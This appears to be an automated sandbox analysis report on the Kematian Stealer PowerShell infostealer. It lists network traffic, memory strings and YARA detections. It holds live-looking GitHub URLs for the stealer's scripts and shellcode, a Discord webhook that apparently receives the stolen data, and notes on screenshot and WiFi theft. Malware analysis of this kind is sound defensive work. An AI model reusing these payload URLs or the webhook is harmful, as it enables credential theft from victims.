            Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1Host: github.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
            Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
            Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
            Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
            Source: Joe Sandbox ViewASN Name: GITHUBUS GITHUBUS
            Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: ip-api.com
            Source: global trafficHTTP traffic detected: GET /ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.cloudflare.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.cloudflare.com
            Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.com
            Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/561131198/03bdc8a9-2834-4aef-a1a7-2d28a7226bb3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240705%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240705T042656Z&X-Amz-Expires=300&X-Amz-Signature=9ec541a8af7357a745f9ee7f2924807d0564c84d8046cdea1a2096e0b623e658&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=561131198&response-content-disposition=attachment%3B%20filename%3Dkematian.bin&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ip-api.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ip-api.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.cloudflare.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.cloudflare.com
            Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1 HTTP/1.1Host: github.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1Host: github.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.com
            Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/561131198/03bdc8a9-2834-4aef-a1a7-2d28a7226bb3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240705%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240705T042656Z&X-Amz-Expires=300&X-Amz-Signature=9ec541a8af7357a745f9ee7f2924807d0564c84d8046cdea1a2096e0b623e658&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=561131198&response-content-disposition=attachment%3B%20filename%3Dkematian.bin&response-content-type=application%2Foctet-stream HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: objects.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ip-api.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ip-api.com
            Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
            Source: global trafficDNS traffic detected: DNS query: www.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: ip-api.com
            Source: global trafficDNS traffic detected: DNS query: github.com
            Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
            Source: powershell.exe, 00000028.00000002.2916812846.0000017E8045A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mh
            Source: powershell.exe, 00000028.00000002.2902014674.0000017E80199000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: powershell.exe, 0000002C.00000002.2105443989.00000201CBF9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
            Source: powershell.exe, 00000028.00000002.2928167979.0000017EE8586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC48591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1947001037.0000029E4A244000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3BB45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2203571094.00000201DAB46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CC350000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000002C.00000002.2105443989.00000201CABC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC48293000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CBFD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
            Source: powershell.exe, 00000024.00000002.1885695376.0000029E3AF3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3A3F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC46CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1821626389.000001AE02764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3A1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE7821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CA991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2355424923.000002A85A781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000024.00000002.1885695376.0000029E3AF3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3A3F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC48328000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 0000002C.00000002.2105443989.00000201CABC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000024.00000002.1956228597.0000029E526AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
            Source: powershell.exe, 00000028.00000002.2909000081.0000017E802B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cv
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC46CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1821626389.000001AE0272A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1821626389.000001AE0273D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3A1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE7821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CA991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2355424923.000002A85A781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000028.00000002.2928167979.0000017EE8586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: powershell.exe, 00000024.00000002.1885695376.0000029E3B7FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
            Source: powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC470EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.X
            Source: powershell.exe, 00000014.00000002.1765375407.000001EC44F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvx
            Source: powershell.exe, 00000014.00000002.1784812345.000001EC5EF50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1241088645289480213/opjqqaosqwrak2j4o5xsc-dugkqcfdvi3tjvq0bt27lstvx
            Source: powershell.exe, 00000030.00000002.2636336709.000002A872D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.cg
            Source: powershell.exe, 0000002C.00000002.2105443989.00000201CBAED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps1
            Source: powershell.exe, 0000002C.00000002.2105443989.00000201CABC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000028.00000002.2928167979.0000017EE866A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EEA035000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE97DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE8E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps1
            Source: powershell.exe, 00000030.00000002.2354975685.000002A85A580000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2355424923.000002A85A9A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1
            Source: powershell.exe, 0000002C.00000002.2105443989.00000201CC220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1
            Source: powershell.exe, 00000030.00000002.2355424923.000002A85AB61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2355424923.000002A85AAF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheWover
            Source: powershell.exe, 00000030.00000002.2354204002.000002A858DB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/kematian_shellcode.ps1
            Source: powershell.exe, 0000002C.00000002.2100725567.00000201C8F76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/webcam.ps1
            Source: powershell.exe, 0000002C.00000002.2105443989.00000201CC037000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CC032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC47B46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3B7FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CBAED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC48591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1947001037.0000029E4A244000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1885695376.0000029E3BB45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2203571094.00000201DAB46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CC350000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2203571094.00000201DAA03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000030.00000002.2355424923.000002A85AB61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com
            Source: powershell.exe, 00000030.00000002.2355424923.000002A85AB61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/561131198/03bdc8a9-2834
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC48328000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC48328000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC47FFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC4713E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.c
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC47FFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC46ED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2105443989.00000201CBFC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
            Source: powershell.exe, 00000014.00000002.1765375407.000001EC44F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1
            Source: powershell.exe, 00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1780292718.000001EC56D24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/injection.js
            Source: powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1
            Source: powershell.exe, 0000002C.00000002.2105443989.00000201CBFC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1
            Source: powershell.exe, 00000014.00000002.1784812345.000001EC5EF50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1
            Source: powershell.exe, 00000030.00000002.2331375157.000000C000274000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2331375157.000000C0000B6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: powershell.exe, 00000030.00000002.2331375157.000000C000247000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: powershell.exe, 00000028.00000002.2928167979.0000017EE82E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com
            Source: powershell.exe, 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/cdn-cgi/trace
            Source: unknownNetwork traffic detected: HTTP traffic on port 63777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 63778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 63776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 63780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63780
            Source: unknownNetwork traffic detected: HTTP traffic on port 63775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 63779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63778
            Source: unknownNetwork traffic detected: HTTP traffic on port 63770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63770
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63776
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:63775 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:63776 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:63777 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:63778 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:63780 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Yara detected PowerShell ScreenShot
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\kematian.ps1, type: DROPPED

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi64_7296.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi64_7296.amsi.csv, type: OTHERMatched rule: Detects PowerShell PoshWiFiStealer Author: ditekSHen
            Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000030.00000002.2641864548.000002A8730B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000030.00000002.2414199980.000002A86A80A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000014.00000002.1765711117.000001EC482E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: 00000014.00000002.1765711117.000001EC47062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTRMatched rule: Detects PowerShell PoshWiFiStealer Author: ditekSHen
            Found large BAT file
            Source: pirates.batStatic file information: 3787378
            Suspicious javascript / visual basic script found (invalid extension)
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript /b
            Writes or reads registry keys via WMI
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Wscript called in batch mode (surpress errors)
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript /b
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A87347D4BF NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtMapViewOfSection,48_2_000002A87347D4BF
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A87347D4DC NtMapViewOfSection,48_2_000002A87347D4DC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFD9BAD118831_2_00007FFD9BAD1188
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A87347D4BF48_2_000002A87347D4BF
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A87347DEB048_2_000002A87347DEB0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FCE8C048_2_000002A873FCE8C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FB786048_2_000002A873FB7860
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A87400238048_2_000002A874002380
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FEC74048_2_000002A873FEC740
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FB55E048_2_000002A873FB55E0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FDA54048_2_000002A873FDA540
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FD1C8048_2_000002A873FD1C80
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FC1BC048_2_000002A873FC1BC0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_000002A873FCA3C048_2_000002A873FCA3C0
